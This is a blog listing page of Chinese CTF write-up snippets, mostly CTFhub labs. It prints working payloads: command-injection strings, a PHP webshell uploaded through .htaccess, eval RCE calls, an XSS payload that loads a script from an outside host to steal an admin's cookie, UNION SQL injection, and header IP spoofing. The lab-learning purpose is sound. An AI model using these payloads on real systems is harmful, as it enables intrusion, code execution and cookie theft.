CTF
luminous_you
记录遇到的问题和解决方案,方便大家少走弯路
展开
-
htb靶场获取邀请码一步到位
参考大佬的博客发现前面的步骤出现的东西都是一样的,如果有兴趣看怎末找注册码可以跳转https://cloud.tencent.com/developer/article/1512000也可以直接命令行输入,生成注册码(省略找的环节)curl -XPOST https://www.hackthebox.eu//api/invite/generateS1RFQVEtWEZaVUItR0tTQUYtRU1XWlgtUVNKQlI=编码转换http://tool.chinaz.com/Tools/B原创 2020-10-31 13:51:45 · 1924 阅读 · 0 评论 -
CTFhub mysql流量分析
mysql流量分析,因为是CTF题所以可以直接查找ctfhub得到答案分析一下mysql数据包中做了什么操作吧两次登陆失败,一次成功然后query了versiondatabasetable查询【ctfhub也出现在这个数据包中k】删除操作mysql contains “admin”为什么要在这里设置flag这篇文章提供了思考,就是这里是攻击者的iphttps://mp.weixin.qq.com/s/5YFdZCrCZ_qvP9oLCeXVyA...原创 2020-12-10 20:30:14 · 2177 阅读 · 0 评论 -
CTFhub命令注入,过滤了cat命令,过滤了空格,过滤目录分隔符,过滤运算符,综合练习
命令注入127.0.0.1&ls127.0.0.1&cat 109131856411048.php过滤了cat命令之后,你还有什么方法能读到 Flag?127.0.0.1&ls127.0.0.1&less flag_2881947412234.php127.0.0.1&more flag_2881947412234.php127.0.0.1&head flag_2881947412234.php127.0.0.1&tail flag_2原创 2020-12-09 23:33:25 · 2796 阅读 · 0 评论 -
ctfhub文件包含:本地文件包含
代码<?php// 关闭错误报告error_reporting(0);if (isset($_GET['file'])) {//strpos — 查找字符串首次出现的位置 if (!strpos($_GET["file"], "flag")) { include $_GET["file"]; } else { echo "Hacker!!!"; }} else { highlight_file(__FILE__);}?&g原创 2020-12-09 00:25:02 · 599 阅读 · 0 评论 -
CTF 00截断
PHP 5.2 00截断上传的原理php解释器是C语言编写的C语言中学过字符串的结尾会有00作为字符串结束的标志在url中%00表示ascll码中的0 ,而ascii中0作为特殊字符保留,表示字符串结束,所以当url中出现%00时就会认为读取已结束0x00,%00,/00之类的截断,都是一样的hex编码修改 更改相应的字节 0x20->0x00【20是空格】https://blog.csdn.net/qq_26090065/article/details/81458937%00截断有两原创 2020-12-08 21:18:30 · 1610 阅读 · 0 评论 -
CTFhub htaccess文件【不用连webshell工具查看flag】
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能康康源代码,有黑名单限制上传.htacess文件,内容为<FilesMatch "is">setHandler application/x-httpd-php</FilesMatch> 上传一句话木马c.is<?p原创 2020-12-08 16:06:21 · 904 阅读 · 0 评论 -
CTFhub RCE eval
方法一:可以用蚁剑直接连接webshellcd /find -name flag*//查找当前目录以及子目录下以flag开头的文件方法二:【这里用post,用get也可以,毕竟是request记得加;】cmd=system(“ls /”);cmd=system(“cd /;ls”);cmd=system(“cd /;cat flag_31360”);...原创 2020-12-07 00:04:12 · 294 阅读 · 0 评论 -
CTFhub 获取网站源码
常见的网站源码备份文件后缀tartar.gzziprar常见的网站源码备份文件名webwebsitebackupbackwwwwwwroottemp7k扫描查到是www.zip ,下载发现flag文件,访问即可得到http://challenge-9936840b90db7048.sandbox.ctfhub.com:10080/flag_288466972.txt也可以自己写python脚本生成一下字典通过获取响应状态码判断#!usr/bin/env python#_*原创 2020-12-06 20:41:32 · 2700 阅读 · 0 评论 -
CTFhub目录遍历
根据响应包长度判断flag在哪里#! /usr/bin/env python# _*_ coding:utf-8 _*_import requestsurl="http://challenge-72fb97d76e335ef0.sandbox.ctfhub.com:10080/flag_in_here"url1="http://challenge-72fb97d76e335ef0.sandbox.ctfhub.com:10080/flag_in_here/1/1"r1=requests.ge原创 2020-12-06 19:33:27 · 824 阅读 · 0 评论 -
CTFhub 反射型xss
查看是否能弹框尝试弹出自己的cookie发现是空的XSS平台第一个输入框<sCRiPt/SrC=//xs.sb/T391>//可以看到图片中下面那个是我们的,没有cookie第二个输入框复制url输入,他第二个输入框是将url发送给了机器人(相当于管理员,这样我们就获取到了管理员的cookie)//图片上面那个是机器人的cookie中含有flaghttp://challenge-6d1eed70035be632.sandbox.ctfhub.com:10080/?name=%原创 2020-12-06 14:46:28 · 1069 阅读 · 1 评论 -
CTFHub SQL 整数型注入[四步]
判断列数1 order by 2 判断回显点1 union select 1,2判断表名列名-1 union select 1,group_concat(table_name,'_',column_name) from information_schema.columns where table_schema=database()得出结果【两种方法】-1 union select 1,flag from sqli.flag limit 0,1-1 union select 1,(se原创 2020-12-04 20:34:51 · 435 阅读 · 0 评论 -
flag{e2f34a3a-9972-4ba5-bdeb-ff7d524d87cb} preg_match implode
要点ccokie:czo1OiJhZG1pbiI7[admin]preg_match的绕过:preg_match()函数只能处理字符串,当传入的变量是数组是会返回falseimplode()函数将数组元素组合成的字符串代码<!DOCTYPE html><html><head> <title>x</title></head><body><?php $role = "guest";$fl原创 2020-12-03 15:10:05 · 282 阅读 · 0 评论 -
当我第一次做ctf的题目
一个签到题,我十分钟,啊这http://192.168.179.100:8081/robots.txtDisallow: /admin_64a62e4db6a30fd53b86673f9be5609564a62e4db6a30fd53b86673f9be56095md5解密不是admin哦,我猜出来的原创 2020-11-19 15:01:53 · 135 阅读 · 0 评论 -
ip不在许可范围内
后台后台密码然而最简单的就是抓包加字段或者装插件SimpleModifyHeadershttps://github.com/didierfred/SimpleModifyHeaders什么你还不会转插件?解压,插件,管理插件程序,加载已解压的扩展程序,选中文件夹http://www.cnplugins.com/zhuanti/newinstall.htmlX-Forwarded-For(XFF) 伪造ip...原创 2020-11-19 15:00:20 · 2164 阅读 · 0 评论